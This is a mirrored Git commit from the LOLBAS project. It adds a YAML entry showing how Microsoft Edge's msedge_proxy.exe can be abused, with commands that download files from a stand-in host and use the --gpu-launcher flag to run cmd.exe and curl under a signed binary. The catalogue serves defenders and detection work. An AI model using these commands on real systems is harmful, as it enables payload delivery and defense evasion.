mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-01-30 07:12:33 +01:00
Create msedge_proxy.yml
This commit is contained in:
parent
4ffdf0ec0b
commit
b14ad21ff9
29
yml/OSBinaries/msedge_proxy.yml
Normal file
29
yml/OSBinaries/msedge_proxy.yml
Normal file
@ -0,0 +1,29 @@
|
|||||||
|
Name: msedge_proxy.exe
|
||||||
|
Description: Microsoft Edge Browser
|
||||||
|
Author: Mert Daş
|
||||||
|
Created: 2023-08-18
|
||||||
|
Commands:
|
||||||
|
- Command: msedge_proxy.exe http://example.com/test.zip
|
||||||
|
Description: msedge_proxy will download malicious file.
|
||||||
|
Usecase: Download file from the internet
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
OperatingSystem: Windows 10, Windows 11
|
||||||
|
- Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&"
|
||||||
|
Description: Edge will silently download the file.
|
||||||
|
Usecase: Download file from the internet
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
OperatingSystem: Windows 10, Windows 11
|
||||||
|
- Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
|
||||||
|
Description: msedge_proxy.exe will execute file in the background
|
||||||
|
Usecase: Executes a process under a trusted Microsoft signed binary
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
OperatingSystem: Windows 10, Windows 11
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Mert Daş
|
||||||
|
Handle: '@merterpreter'
|
Loading…
Reference in New Issue
Block a user